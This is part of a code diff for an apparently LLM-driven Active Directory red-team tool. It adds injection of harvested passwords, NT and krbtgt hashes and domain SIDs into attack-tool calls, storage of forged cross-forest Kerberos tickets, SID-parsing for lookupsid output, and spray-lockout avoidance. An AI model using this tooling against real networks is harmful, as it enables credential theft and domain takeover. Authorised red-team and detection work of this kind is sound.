"ca.contoso.local", + "coerce_target": "dc01.contoso.local", + "coerce_user": "svc-coerce", + "coerce_domain": "contoso.local" + }) + .as_object() + .unwrap() + .clone(); + resolve_coerce_principal(&mut args, &creds, &hashes); + assert_eq!(args.get("coerce_hash").unwrap().as_str(), Some("deadbeef")); + assert!(args.get("coerce_password").is_none()); + } + + #[test] + fn resolve_coerce_principal_noop_without_user() { + let creds = vec![cred("svc-coerce", "contoso.local", "C0erceP@ss")]; + let hashes = vec![hash("svc-coerce", "contoso.local", "deadbeef", None)]; + let mut args = json!({ + "ca_host": "ca.contoso.local", + "coerce_target": "dc01.contoso.local" + }) + .as_object() + .unwrap() + .clone(); + resolve_coerce_principal(&mut args, &creds, &hashes); + assert!(args.get("coerce_password").is_none()); + assert!(args.get("coerce_hash").is_none()); + } + + #[test] + fn resolve_coerce_principal_does_not_overwrite_existing() { + let creds = vec![cred("svc-coerce", "contoso.local", "fromstate")]; + let hashes: Vec = vec![]; + let mut args = json!({ + "coerce_user": "svc-coerce", + "coerce_domain": "contoso.local", + "coerce_password": "passed-in" + }) + .as_object() + .unwrap() + .clone(); + resolve_coerce_principal(&mut args, &creds, &hashes); + assert_eq!( + args.get("coerce_password").unwrap().as_str(), + Some("passed-in") + ); + } + + #[test] + fn resolve_krbtgt_hashes_injects_for_domain() { + let hashes = vec![hash("krbtgt", "contoso.local", "kr1", None)]; + let mut args = json!({"domain": "contoso.local"}) + .as_object() + .unwrap() + .clone(); + resolve_krbtgt_hashes(&mut args, &hashes); + assert_eq!(args.get("krbtgt_hash").unwrap().as_str(), Some("kr1")); + } + + #[test] + fn resolve_krbtgt_hashes_injects_child() { + let hashes = vec![hash("krbtgt", "child.contoso.local", "kr-child", None)]; + let mut args = json!({"child_domain": "child.contoso.local"}) + .as_object() + .unwrap() + .clone(); + resolve_krbtgt_hashes(&mut args, &hashes); + assert_eq!( + args.get("child_krbtgt_hash").unwrap().as_str(), + Some("kr-child") + ); + } + + #[test] + fn resolve_domain_sids_injects_all() { + let mut sids = std::collections::HashMap::new(); + sids.insert("contoso.local".to_string(), "S-1-5-21-100".to_string()); + sids.insert("fabrikam.local".to_string(), "S-1-5-21-200".to_string()); + + let mut args = json!({ + "domain": "contoso.local", + "source_domain": "contoso.local", + "target_domain": "fabrikam.local" + }) + .as_object() + .unwrap() + .clone(); + resolve_domain_sids(&mut args, &sids); + assert_eq!( + args.get("domain_sid").unwrap().as_str(), + Some("S-1-5-21-100") + ); + assert_eq!( + args.get("source_sid").unwrap().as_str(), + Some("S-1-5-21-100") + ); + assert_eq!( + args.get("target_sid").unwrap().as_str(), + Some("S-1-5-21-200") + ); + } + + #[test] + fn resolve_domain_sids_does_not_overwrite() { + let mut sids = std::collections::HashMap::new(); + sids.insert("contoso.local".to_string(), "S-1-5-21-100".to_string()); + + let mut args = json!({ + "domain": "contoso.local", + "domain_sid": "S-1-5-21-existing" + }) + .as_object() + .unwrap() + .clone(); + resolve_domain_sids(&mut args, &sids); + assert_eq!( + args.get("domain_sid").unwrap().as_str(), + Some("S-1-5-21-existing") + ); + } + + #[test] + fn nt_hash_only_strips_lm() { + assert_eq!( + nt_hash_only("aad3b435b51404eeaad3b435b51404ee:d350c5900e26d2c95f501e94cf95b078"), + "d350c5900e26d2c95f501e94cf95b078" + ); + } + + #[test] + fn nt_hash_only_passes_through() { + assert_eq!( + nt_hash_only("d350c5900e26d2c95f501e94cf95b078"), + "d350c5900e26d2c95f501e94cf95b078" + ); + } + + #[test] + fn expects_ticket_kerberos_tools() { + let empty_args = json!({}).as_object().unwrap().clone(); + assert!(expects_ticket("psexec_kerberos", &empty_args)); + assert!(expects_ticket("wmiexec_kerberos", &empty_args)); + assert!(expects_ticket("secretsdump_kerberos", &empty_args)); + } + + #[test] + fn expects_ticket_skips_non_kerberos() { + let empty_args = json!({}).as_object().unwrap().clone(); + assert!(!expects_ticket("psexec", &empty_args)); + assert!(!expects_ticket("nmap_scan", &empty_args)); + } + + #[test] + fn expects_ticket_skips_when_already_set() { + let args_with_ticket = json!({"ticket_path": "/tmp/x.ccache"}) + .as_object() + .unwrap() + .clone(); + assert!(!expects_ticket("psexec_kerberos", &args_with_ticket)); + } + + // ── cross-forest Kerberos ticket injection ────────────────────────────── + + #[test] + fn resolve_cross_forest_ticket_not_injected_when_ntlm_exists() { + // When the hashes slice contains a matching NTLM hash for the target + // domain, is_authenticating_hash_type returns true and the function + // short-circuits — no Kerberos injection needed. + let hashes = [hash("admin", "fabrikam.local", "deadbeef00112233", None)]; + let domain_l = "fabrikam.local"; + // Replicate the guard logic from resolve_cross_forest_ticket + let user_l = "admin"; + let has_ntlm = hashes.iter().any(|h| { + h.domain.to_lowercase() == domain_l + && (user_l.is_empty() || h.username.to_lowercase() == user_l) + && !h.hash_value.is_empty() + && is_authenticating_hash_type(&h.hash_type) + }); + assert!( + has_ntlm, + "NTLM hash present — Kerberos injection should be skipped" + ); + } + + #[test] + fn resolve_cross_forest_ticket_triggered_when_no_ntlm_for_target() { + // When no NTLM hash for the target domain exists, the resolver should + // proceed to the Redis lookup for a forged ccache. + let hashes = [hash("administrator", "contoso.local", "deadbeef", None)]; + let domain_l = "fabrikam.local"; // foreign domain, no entry in hashes + let user_l = "administrator"; + let has_ntlm = hashes.iter().any(|h| { + h.domain.to_lowercase() == domain_l + && (user_l.is_empty() || h.username.to_lowercase() == user_l) + && !h.hash_value.is_empty() + && is_authenticating_hash_type(&h.hash_type) + }); + assert!( + !has_ntlm, + "No NTLM hash for fabrikam.local — resolver should attempt Kerberos ticket lookup" + ); + } + + #[test] + fn requires_exact_realm_bloodyad_set_password_is_true() { + // Confirm the canary tool is covered by realm_strict so that the + // cross-forest ticket injection fires for it. + assert!(requires_exact_realm("bloodyad_set_password")); + } +} diff --git a/ares-cli/src/worker/mod.rs b/ares-cli/src/worker/mod.rs index bf798649..84e43a65 100644 --- a/ares-cli/src/worker/mod.rs +++ b/ares-cli/src/worker/mod.rs @@ -7,6 +7,7 @@ #[cfg(feature = "blue")] mod blue_task_loop; mod config; +pub mod credential_resolver; mod heartbeat; mod hosts; mod task_loop; diff --git a/ares-cli/src/worker/task_loop/result_handler.rs b/ares-cli/src/worker/task_loop/result_handler.rs index a185d89d..c703fd26 100644 --- a/ares-cli/src/worker/task_loop/result_handler.rs +++ b/ares-cli/src/worker/task_loop/result_handler.rs @@ -81,12 +81,12 @@ pub async fn process_task( if let Some(ref usage) = ar.usage { result_payload["usage"] = serde_json::to_value(usage).unwrap_or_default(); } - // Include structured discoveries parsed from tool output + // Include structured discoveries parsed from tool output. + // Must be nested under "discoveries" — the orchestrator's + // process_completed_task extracts from payload["discoveries"]. if let Some(ref disc) = ar.discoveries { - if let Some(obj) = disc.as_object() { - for (k, v) in obj { - result_payload[k] = v.clone(); - } + if disc.as_object().is_some_and(|o| !o.is_empty()) { + result_payload["discoveries"] = disc.clone(); } } ( diff --git a/ares-cli/src/worker/tool_executor.rs b/ares-cli/src/worker/tool_executor.rs index 2dcbdf69..2f6b3b51 100644 --- a/ares-cli/src/worker/tool_executor.rs +++ b/ares-cli/src/worker/tool_executor.rs @@ -263,7 +263,29 @@ async fn execute_and_respond( let di = extract_target_info(&request.arguments); let dt = infer_target_type_from_info(&di); - let response = match ares_tools::dispatch(&request.tool_name, &request.arguments).await { + // Resolve credentials from operation state. The LLM never passes secret + // material — usernames + domains only. Anything that arrives looking like + // a placeholder is stripped, then the resolver fills in real values from + // harvested state by `(username, domain)`. + let mut resolved_arguments = request.arguments.clone(); + if let Err(e) = super::credential_resolver::resolve_credentials( + conn, + request.operation_id.as_deref(), + &request.tool_name, + &mut resolved_arguments, + ) + .await + { + warn!( + tool = %request.tool_name, + call_id = %request.call_id, + err = %e, + "credential_resolver failed; continuing with original arguments" + ); + resolved_arguments = request.arguments.clone(); + } + + let response = match ares_tools::dispatch(&request.tool_name, &resolved_arguments).await { Ok(output) => { // Raw output for structured parsers (need unfiltered data) let raw = output.combined_raw(); @@ -279,7 +301,7 @@ async fn execute_and_respond( let discoveries = ares_tools::parsers::parse_tool_output( &request.tool_name, &raw, - &request.arguments, + &resolved_arguments, ); let discoveries = if discoveries.as_object().is_none_or(|o| o.is_empty()) { None @@ -287,23 +309,53 @@ async fn execute_and_respond( Some(discoveries) }; - // Emit discovery spans for observability + // Emit discovery spans for observability. + // For "hosts" discoveries, emit one span per discovered host so each + // gets a clean destination.address (instead of the raw CIDR/multi-IP + // input target). Other discovery types use the extracted target info. if let Some(ref disc) = discoveries { if let Some(obj) = disc.as_object() { for (disc_type, items) in obj { - let count = items.as_array().map(|a| a.len()).unwrap_or(0); - if count > 0 { - let span = trace_discovery( - disc_type, - &request.tool_name, - di.target_user.as_deref(), - None, - di.target_ip.as_deref(), - di.target_fqdn.as_deref(), - dt, - request.operation_id.as_deref(), - ); - let _guard = span.enter(); + if disc_type == "hosts" { + // Per-host spans with individual IPs/hostnames + if let Some(hosts) = items.as_array() { + for host in hosts { + let host_ip = host.get("ip").and_then(|v| v.as_str()); + let host_fqdn = host + .get("hostname") + .and_then(|v| v.as_str()) + .filter(|h| !h.is_empty()); + let host_target_type = host_fqdn + .map(ares_core::telemetry::target::infer_target_type) + .or(dt); + let span = trace_discovery( + disc_type, + &request.tool_name, + di.target_user.as_deref(), + None, + host_ip, + host_fqdn, + host_target_type, + request.operation_id.as_deref(), + ); + let _guard = span.enter(); + } + } + } else { + let count = items.as_array().map(|a| a.len()).unwrap_or(0); + if count > 0 { + let span = trace_discovery( + disc_type, + &request.tool_name, + di.target_user.as_deref(), + None, + di.target_ip.as_deref(), + di.target_fqdn.as_deref(), + dt, + request.operation_id.as_deref(), + ); + let _guard = span.enter(); + } } } } diff --git a/ares-core/src/correlation/redblue/tests.rs b/ares-core/src/correlation/redblue/tests.rs index 319e70dd..5f5c0264 100644 --- a/ares-core/src/correlation/redblue/tests.rs +++ b/ares-core/src/correlation/redblue/tests.rs @@ -769,6 +769,10 @@ fn new_custom_time_window() { assert_eq!(correlator.time_window.num_minutes(), 60); } +// ----------------------------------------------------------------------- +// recommend_detection — exhaustive per-technique checks +// ----------------------------------------------------------------------- + #[test] fn recommend_detection_t1046_mentions_scanning() { let activity = make_red_activity("T1046", "192.168.58.10", utc(12, 0)); @@ -817,6 +821,10 @@ fn recommend_detection_unknown_technique_returns_none() { assert!(RedBlueCorrelator::recommend_detection(&activity).is_none()); } +// ----------------------------------------------------------------------- +// determine_gap_reason — additional edge cases +// ----------------------------------------------------------------------- + #[test] fn determine_gap_reason_empty_detections_list() { let activity = make_red_activity("T1046", "192.168.58.10", utc(12, 0)); @@ -838,6 +846,10 @@ fn determine_gap_reason_technique_matches_via_parent() { assert!(reason.contains("Alert exists but did not trigger")); } +// ----------------------------------------------------------------------- +// correlate — additional edge cases +// ----------------------------------------------------------------------- + #[test] fn correlate_false_positive_rate_zero_when_no_detections_in_window() { let correlator = RedBlueCorrelator::new("/tmp", Some(5)); diff --git a/ares-core/src/models/core.rs b/ares-core/src/models/core.rs index 342bea83..02485123 100644 --- a/ares-core/src/models/core.rs +++ b/ares-core/src/models/core.rs @@ -83,6 +83,17 @@ pub struct User { pub source: String, } +/// AD built-in accounts that ship `userAccountControl & ACCOUNTDISABLE` set +/// out of the box. Spraying or otherwise auth'ing against these can never +/// succeed and just burns the per-account badPwdCount budget — which on +/// shared lockout policies trips real accounts in the same window. +pub fn is_always_disabled_account(username: &str) -> bool { + matches!( + username.to_lowercase().as_str(), + "guest" | "defaultaccount" | "wdagutilityaccount" | "krbtgt" + ) +} + /// Discovered credential. /// /// Matches Python: `class Credential(Model)` @@ -504,6 +515,91 @@ impl TrustInfo { } } +/// Strength of evidence that a candidate string is a real AD domain. +/// +/// Production AD discovery tools (BloodHound, NetExec, runZero) never trust a +/// hostname suffix alone — they require positive AD evidence (DC self-report, +/// authenticated bind, SRV record) before promoting a string to "authoritative +/// domain." This enum lets us tag the source of each candidate so the promotion +/// rules can stay consistent across discovery paths. +#[derive(Debug, Clone, Copy, Serialize, Deserialize, PartialEq, Eq, Hash)] +#[serde(rename_all = "snake_case")] +pub enum DomainEvidence { + /// Configured in the operation target — authoritative starting point. + TargetConfig, + /// A DC self-reported the domain name (CLDAP NetLogon `DnsDomainName`, + /// Kerberos AS-REP `crealm`, anonymous LDAP RootDSE `defaultNamingContext`). + DcSelfReport, + /// Captured from authenticated AD enumeration — successful LDAP bind, + /// secretsdump, SMB session info from a verified auth. + AuthenticatedAd, + /// DNS SRV record `_ldap._tcp.dc._msdcs.` resolves. + DnsSrv, + /// Inferred from a host FQDN suffix (e.g. `srv01.contoso.local` → + /// `contoso.local`). Lowest tier — must be corroborated before promotion. + HostnameInference, +} + +impl DomainEvidence { + /// Whether this evidence is sufficient to promote a candidate to + /// authoritative state without further corroboration. + pub fn is_authoritative(self) -> bool { + matches!( + self, + Self::TargetConfig | Self::DcSelfReport | Self::AuthenticatedAd | Self::DnsSrv + ) + } +} + +/// A domain name discovered during an operation, with provenance. +/// +/// Held in `state.candidate_domains` until either (a) the evidence is +/// authoritative on its own, (b) a probe (DNS SRV / CLDAP) corroborates it, +/// or (c) it matches a domain already promoted via another path. +#[derive(Debug, Clone, Serialize, Deserialize, PartialEq)] +pub struct CandidateDomain { + /// Lowercase FQDN. + pub fqdn: String, + pub evidence: DomainEvidence, + /// IP of the host that produced this candidate (when applicable). + #[serde(default, skip_serializing_if = "Option::is_none")] + pub source_host_ip: Option, + pub discovered_at: DateTime, + /// Set once a probe has run. `confirmed = false` after probing means the + /// probe rejected it; we keep the record so we don't re-probe. + #[serde(default)] + pub probed: bool, + #[serde(default)] + pub confirmed: bool, + /// Timestamp of the most recent probe attempt. Used to retry transient + /// probe failures without hammering DNS every loop. + #[serde(default, skip_serializing_if = "Option::is_none")] + pub last_probed_at: Option>, + /// Count of transient probe attempts. Useful for visibility/backoff. + #[serde(default)] + pub probe_failures: u32, +} + +impl CandidateDomain { + pub fn new(fqdn: impl Into, evidence: DomainEvidence) -> Self { + Self { + fqdn: fqdn.into().to_lowercase(), + evidence, + source_host_ip: None, + discovered_at: Utc::now(), + probed: false, + confirmed: evidence.is_authoritative(), + last_probed_at: None, + probe_failures: 0, + } + } + + pub fn with_source(mut self, ip: impl Into) -> Self { + self.source_host_ip = Some(ip.into()); + self + } +} + /// Discovered SMB share. /// /// Matches Python: `class Share(Model)` @@ -517,3 +613,35 @@ pub struct Share { #[serde(default, skip_serializing_if = "String::is_empty")] pub comment: String, } + +/// A forged Kerberos inter-realm ticket produced by `create_inter_realm_ticket`. +/// +/// Stored in Redis (`ares:op:{id}:kerberos_tickets` HASH keyed by +/// `{source_domain}:{target_domain}:{username}`) so downstream tools can pick +/// up the ccache path when no NTLM bind works for the target forest. +#[derive(Debug, Clone, Serialize, Deserialize, PartialEq)] +pub struct KerberosTicket { + /// The domain whose krbtgt trust key was used to forge (source forest). + pub source_domain: String, + /// The foreign forest the ticket is valid for. + pub target_domain: String, + /// Username encoded in the ticket (typically `Administrator`). + pub username: String, + /// Absolute path to the `.ccache` file on the worker filesystem. + pub ticket_path: String, + /// When the ticket was forged (UTC). + #[serde(default, skip_serializing_if = "Option::is_none")] + pub forged_at: Option>, +} + +impl KerberosTicket { + /// Redis HASH field key: `{source}:{target}:{username}`. + pub fn dedup_key(&self) -> String { + format!( + "{}:{}:{}", + self.source_domain.to_lowercase(), + self.target_domain.to_lowercase(), + self.username.to_lowercase() + ) + } +} diff --git a/ares-core/src/models/mod.rs b/ares-core/src/models/mod.rs index ce1d432e..0e24b690 100644 --- a/ares-core/src/models/mod.rs +++ b/ares-core/src/models/mod.rs @@ -15,7 +15,10 @@ pub use blue::{ BlueTaskInfo, Evidence, InvestigationStage, PyramidLevel, SharedBlueTeamState, TimelineEvent, TriageDecision, TriageRecord, }; -pub use core::{Credential, Hash, Host, Share, Target, TrustInfo, User}; +pub use core::{ + is_always_disabled_account, CandidateDomain, Credential, DomainEvidence, Hash, Host, + KerberosTicket, Share, Target, TrustInfo, User, +}; pub use operation::{AttackChainStep, OperationMeta, SharedRedTeamState}; pub use task::{ AgentInfo, AgentRole, TaskInfo, TaskResult, TaskStatus, TaskStatusRecord, VulnerabilityInfo, @@ -156,4 +159,22 @@ mod tests { assert_eq!(TaskStatus::InProgress.to_string(), "in_progress"); assert_eq!(TaskStatus::Pending.to_string(), "pending"); } + + #[test] + fn is_always_disabled_account_canonical() { + assert!(is_always_disabled_account("Guest")); + assert!(is_always_disabled_account("guest")); + assert!(is_always_disabled_account("GUEST")); + assert!(is_always_disabled_account("krbtgt")); + assert!(is_always_disabled_account("DefaultAccount")); + assert!(is_always_disabled_account("WDAGUtilityAccount")); + } + + #[test] + fn is_always_disabled_account_excludes_real_users() { + assert!(!is_always_disabled_account("Administrator")); + assert!(!is_always_disabled_account("svc_sql")); + assert!(!is_always_disabled_account("jdoe")); + assert!(!is_always_disabled_account("")); + } } diff --git a/ares-core/src/parsing/domain_sid.rs b/ares-core/src/parsing/domain_sid.rs index b7ee5a01..472dcf4e 100644 --- a/ares-core/src/parsing/domain_sid.rs +++ b/ares-core/src/parsing/domain_sid.rs @@ -6,15 +6,64 @@ use std::sync::LazyLock; static DOMAIN_SID_RE: LazyLock = LazyLock::new(|| Regex::new(r"S-1-5-21-\d+-\d+-\d+").expect("domain sid regex")); +/// Match the impacket-lookupsid "Domain SID is:" announcement line — the +/// authoritative signal that the surrounding output is a genuine LSARPC SID +/// brute-force, not arbitrary recon text containing stray SIDs. +pub static LOOKUPSID_HEADER_RE: LazyLock = LazyLock::new(|| { + Regex::new(r"(?m)^\[\*\]\s+Domain SID is:\s+(S-1-5-21-\d+-\d+-\d+)") + .expect("lookupsid header regex") +}); + +/// Match `rpcclient -c lsaquery` output. Produces: +/// +/// ```text +/// Domain Name: FABRIKAM +/// Domain Sid: S-1-5-21-3030751166-2423545109-3706592460 +/// ``` +/// +/// Like impacket-lookupsid, this is an authoritative LSARPC response — the +/// flat name and SID together belong to the queried server's primary domain. +/// Often works with anonymous/null sessions where impacket-lookupsid fails, +/// so it's the primary unauth path for cross-forest target SID discovery. +pub static LSAQUERY_DOMAIN_SID_RE: LazyLock = LazyLock::new(|| { + Regex::new(r"(?m)^Domain Name:\s+(\S+)\s*\r?\nDomain Sid:\s+(S-1-5-21-\d+-\d+-\d+)") + .expect("lsaquery domain sid regex") +}); + /// Regex to extract the RID-500 account name from lookupsid output. /// Matches lines like: `500: DOMAIN\AccountName (SidTypeUser)` static RID500_RE: LazyLock = LazyLock::new(|| { Regex::new(r"(?m)^500:\s+[^\\]+\\(.+?)\s+\(SidTypeUser\)").expect("rid500 regex") }); -/// Extract the first domain SID (`S-1-5-21-...`) found in the output. +/// Regex matching any RID line in lookupsid output to capture the flat/NetBIOS +/// domain name. Matches lines like: `500: DOMAIN\AccountName (SidType...)`. +static RID_FLAT_NAME_RE: LazyLock = LazyLock::new(|| { + Regex::new(r"(?m)^\d+:\s+([^\\\s]+)\\.+?\s+\(SidType").expect("rid flat name regex") +}); + +/// Extract the first *bare* domain SID (`S-1-5-21-A-B-C`) found in the output. +/// +/// "Bare" means the matched SID is **not** the prefix of a longer principal +/// SID like `S-1-5-21-A-B-C-RID`. Such longer SIDs appear in LDAP recon +/// output as Foreign Security Principals (e.g. `S-1-5-21-…-519` for a +/// foreign Enterprise Admins group) and previously caused this function to +/// truncate them into a fake "domain SID" that didn't belong to any domain +/// — which then misled the orchestrator into forging tickets with the wrong +/// ExtraSid. pub fn extract_domain_sid(output: &str) -> Option { - DOMAIN_SID_RE.find(output).map(|m| m.as_str().to_string()) + let bytes = output.as_bytes(); + for m in DOMAIN_SID_RE.find_iter(output) { + let end = m.end(); + let next = bytes.get(end).copied(); + let after_next = bytes.get(end + 1).copied(); + // Reject when the match is followed by `-` (truncated longer SID). + if next == Some(b'-') && matches!(after_next, Some(b) if b.is_ascii_digit()) { + continue; + } + return Some(m.as_str().to_string()); + } + None } /// Extract the account name for RID 500 from lookupsid output. @@ -27,6 +76,36 @@ pub fn extract_rid500_name(output: &str) -> Option { RID500_RE.captures(output).map(|c| c[1].to_string()) } +/// Extract `(flat_name, sid)` together from lookupsid output, anchoring the +/// SID to the NetBIOS/flat name visible on the same RID lines. +/// +/// Returns `None` if either the SID or the flat name is missing — the caller +/// must then resolve the FQDN itself rather than guessing from task context. +/// +/// Why this matters: a task targeting `north.contoso.local` can produce output +/// referencing `S-1-5-21-…` for the trusted forest's domain (e.g. via lookupsid +/// over a foreign trust). Anchoring to the flat name lets the caller map the +/// SID to the correct FQDN via `netbios_to_fqdn` instead of misattributing it +/// to the task's source domain. +pub fn extract_domain_sid_and_flat_name(output: &str) -> Option<(String, String)> { + let sid = extract_domain_sid(output)?; + let flat = RID_FLAT_NAME_RE + .captures(output) + .map(|c| c[1].to_uppercase())?; + Some((flat, sid)) +} + +/// Extract `(flat_name, sid)` from `rpcclient lsaquery` output. Returns the +/// queried server's primary-domain flat name (uppercased) paired with the +/// authoritative LSARPC-reported domain SID. Returns `None` if the output is +/// not from `lsaquery` or only one of the two fields is present. +pub fn extract_lsaquery_domain_sid(output: &str) -> Option<(String, String)> { + let caps = LSAQUERY_DOMAIN_SID_RE.captures(output)?; + let flat = caps.get(1)?.as_str().to_uppercase(); + let sid = caps.get(2)?.as_str().to_string(); + Some((flat, sid)) +} + #[cfg(test)] mod tests { use super::*; @@ -103,4 +182,138 @@ mod tests { None ); } + + #[test] + fn extracts_flat_name_alongside_sid() { + let output = "[*] Brute forcing SIDs at 192.168.58.10\n\ + [*] Domain SID is: S-1-5-21-100-200-300\n\ + 498: CONTOSO\\Enterprise Read-only Domain Controllers (SidTypeGroup)\n\ + 500: CONTOSO\\Administrator (SidTypeUser)\n"; + let result = extract_domain_sid_and_flat_name(output); + assert_eq!( + result, + Some(("CONTOSO".to_string(), "S-1-5-21-100-200-300".to_string())) + ); + } + + #[test] + fn extract_flat_name_and_sid_uppercases() { + let output = "[*] Domain SID is: S-1-5-21-1-2-3\n\ + 500: contoso\\Administrator (SidTypeUser)\n"; + let result = extract_domain_sid_and_flat_name(output); + assert_eq!(result.as_ref().map(|(f, _)| f.as_str()), Some("CONTOSO")); + } + + #[test] + fn extract_flat_name_without_sid_returns_none() { + let output = "500: CONTOSO\\Administrator (SidTypeUser)\n"; + assert_eq!(extract_domain_sid_and_flat_name(output), None); + } + + #[test] + fn extract_flat_name_without_rid_lines_returns_none() { + let output = "[*] Domain SID is: S-1-5-21-1-2-3\n"; + assert_eq!(extract_domain_sid_and_flat_name(output), None); + } + + #[test] + fn extract_domain_sid_skips_truncated_principal_sid() { + // Foreign-security-principal SID `…-519` (Enterprise Admins) must NOT + // be silently truncated to a fake domain SID. This was the root cause + // of op-20260429-164553 forging a ticket with the wrong ExtraSid. + let output = "objectSid: S-1-5-21-3030751166-2423545109-3706592460-519\n"; + assert_eq!(extract_domain_sid(output), None); + } + + #[test] + fn extract_domain_sid_skips_principal_returns_later_bare_sid() { + let output = + "fsp: S-1-5-21-100-200-300-519\nDomain SID is: S-1-5-21-916080216-17955212-404331485\n"; + assert_eq!( + extract_domain_sid(output), + Some("S-1-5-21-916080216-17955212-404331485".to_string()) + ); + } + + #[test] + fn extract_domain_sid_accepts_bare_sid_followed_by_dash_letter() { + // A trailing `-` (e.g. inside a CN) is fine — only `-` + // indicates a truncated longer principal SID. + let output = "S-1-5-21-100-200-300-foo\n"; + assert_eq!( + extract_domain_sid(output), + Some("S-1-5-21-100-200-300".to_string()) + ); + } + + #[test] + fn extract_domain_sid_accepts_bare_sid_at_end_of_input() { + let output = "S-1-5-21-100-200-300"; + assert_eq!( + extract_domain_sid(output), + Some("S-1-5-21-100-200-300".to_string()) + ); + } + + #[test] + fn extract_lsaquery_basic() { + let output = "Domain Name: FABRIKAM\n\ + Domain Sid: S-1-5-21-3030751166-2423545109-3706592460\n"; + assert_eq!( + extract_lsaquery_domain_sid(output), + Some(( + "FABRIKAM".to_string(), + "S-1-5-21-3030751166-2423545109-3706592460".to_string() + )) + ); + } + + #[test] + fn extract_lsaquery_with_preamble() { + let output = "[*] Connecting to 192.168.58.58\n\ + Domain Name: CONTOSO\n\ + Domain Sid: S-1-5-21-100-200-300\n\ + [*] Done.\n"; + assert_eq!( + extract_lsaquery_domain_sid(output), + Some(("CONTOSO".to_string(), "S-1-5-21-100-200-300".to_string())) + ); + } + + #[test] + fn extract_lsaquery_uppercases_flat_name() { + let output = "Domain Name: contoso\nDomain Sid: S-1-5-21-1-2-3\n"; + assert_eq!( + extract_lsaquery_domain_sid(output).map(|(f, _)| f), + Some("CONTOSO".to_string()) + ); + } + + #[test] + fn extract_lsaquery_handles_crlf() { + let output = "Domain Name: FABRIKAM\r\nDomain Sid: S-1-5-21-1-2-3\r\n"; + assert_eq!( + extract_lsaquery_domain_sid(output).map(|(_, s)| s), + Some("S-1-5-21-1-2-3".to_string()) + ); + } + + #[test] + fn extract_lsaquery_requires_both_lines() { + // Missing Domain Sid line + let no_sid = "Domain Name: FABRIKAM\n"; + assert_eq!(extract_lsaquery_domain_sid(no_sid), None); + // Missing Domain Name line + let no_name = "Domain Sid: S-1-5-21-1-2-3\n"; + assert_eq!(extract_lsaquery_domain_sid(no_name), None); + } + + #[test] + fn extract_lsaquery_requires_adjacency() { + // Lines not adjacent — pattern intentionally requires them on + // consecutive lines so we don't pair the wrong (flat, sid) when + // multiple servers/responses are concatenated. + let output = "Domain Name: FABRIKAM\nUnrelated line here\nDomain Sid: S-1-5-21-1-2-3\n"; + assert_eq!(extract_lsaquery_domain_sid(output), None); + } } diff --git a/ares-core/src/state/dedup_keys.rs b/ares-core/src/state/dedup_keys.rs index ae7b0c07..70ec6917 100644 --- a/ares-core/src/state/dedup_keys.rs +++ b/ares-core/src/state/dedup_keys.rs @@ -21,12 +21,15 @@ pub fn build_credential_dedup_key(cred: &Credential) -> String { format!("cred:{domain}:{username}:{password_hash_short}") } -/// Build hash dedup key matching Python's `_build_hash_dedup_key()`. +/// Build hash dedup key. /// /// Dedup key format varies by hash type: /// - AS-REP: `asrep:{domain}:{username}` /// - Kerberoast: `krb:{domain}:{username}:{etype}:{spn}` or `krb:{domain}:{username}:{hash[:32]}` -/// - NTLM/other: `ntlm:{domain}:{username}:{hash[:32]}` +/// - NTLM/other: `ntlm:{domain}:{username}:{nt_hash}` — NT half of `lm:nt`, +/// not LM, because AD always emits the empty-LM placeholder +/// `aad3b435b51404eeaad3b435b51404ee` and a `hash_value[..32]` prefix would +/// collapse every user's password rotations into a single dedup slot. pub fn build_hash_dedup_key(hash: &Hash) -> String { let hash_type = hash.hash_type.trim().to_lowercase(); let hash_value = &hash.hash_value; @@ -54,8 +57,18 @@ pub fn build_hash_dedup_key(hash: &Hash) -> String { } // NTLM/other - let prefix = &hash_value[..32.min(hash_value.len())]; - format!("ntlm:{domain}:{username}:{prefix}") + let key_part = ntlm_dedup_key_part(hash_value); + format!("ntlm:{domain}:{username}:{key_part}") +} + +/// For an `lm:nt` NTLM pair, return the NT half. For a single 32-char hash +/// (already-NT or non-standard formats), return up to 32 chars. +fn ntlm_dedup_key_part(hash_value: &str) -> &str { + if let Some((_, nt)) = hash_value.split_once(':') { + &nt[..32.min(nt.len())] + } else { + &hash_value[..32.min(hash_value.len())] + } } /// Extract SPN and encryption type from a Kerberoast hash for deduplication. @@ -173,7 +186,49 @@ mod tests { "aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634", ); let key = build_hash_dedup_key(&h); - assert!(key.starts_with("ntlm:contoso.local:admin:")); + // Must include the NT half, not the empty-LM placeholder, otherwise + // every AD account dedups to the same prefix. + assert_eq!( + key, + "ntlm:contoso.local:admin:209c6174da490caeb422f3fa5a7ae634" + ); + } + + #[test] + fn hash_dedup_key_ntlm_password_rotation_distinct() { + // Same user, two different NT hashes (e.g. password rotation between + // dumps). The keys must differ so the second hash is stored, not + // silently dropped by dedup. + let h1 = make_hash( + "admin", + "contoso.local", + "NTLM", + "aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634", + ); + let h2 = make_hash( + "admin", + "contoso.local", + "NTLM", + "aad3b435b51404eeaad3b435b51404ee:1111222233334444555566667777aaaa", + ); + assert_ne!(build_hash_dedup_key(&h1), build_hash_dedup_key(&h2)); + } + + #[test] + fn hash_dedup_key_ntlm_bare_nt_hash() { + // Some sources emit just a 32-char NT hash without the LM:NT pair. + // The key should still be deterministic and stable. + let h = make_hash( + "admin", + "contoso.local", + "NTLM", + "209c6174da490caeb422f3fa5a7ae634", + ); + let key = build_hash_dedup_key(&h); + assert_eq!( + key, + "ntlm:contoso.local:admin:209c6174da490caeb422f3fa5a7ae634" + ); } #[test] diff --git a/ares-core/src/state/keys.rs b/ares-core/src/state/keys.rs index 26929474..a534f7f9 100644 --- a/ares-core/src/state/keys.rs +++ b/ares-core/src/state/keys.rs @@ -22,6 +22,9 @@ pub const KEY_USERS: &str = "users"; pub const KEY_SHARES: &str = "shares"; /// Redis SET key suffix for discovered domain names. pub const KEY_DOMAINS: &str = "domains"; +/// Redis HASH key suffix for candidate domains awaiting corroboration. +/// Field = lowercase FQDN, value = `CandidateDomain` JSON. +pub const KEY_CANDIDATE_DOMAINS: &str = "candidate_domains"; /// Redis HASH key suffix for discovered vulnerabilities (vuln_id → JSON). pub const KEY_VULNS: &str = "vulns"; /// Redis SET key suffix for exploited vulnerability IDs. @@ -62,6 +65,10 @@ pub const KEY_DOMAIN_SIDS: &str = "domain_sids"; pub const KEY_ADMIN_NAMES: &str = "admin_names"; /// Redis HASH key suffix mapping domain FQDN → TrustInfo JSON. pub const KEY_TRUSTED_DOMAINS: &str = "trusted_domains"; +/// Redis SET key suffix for domain FQDNs where 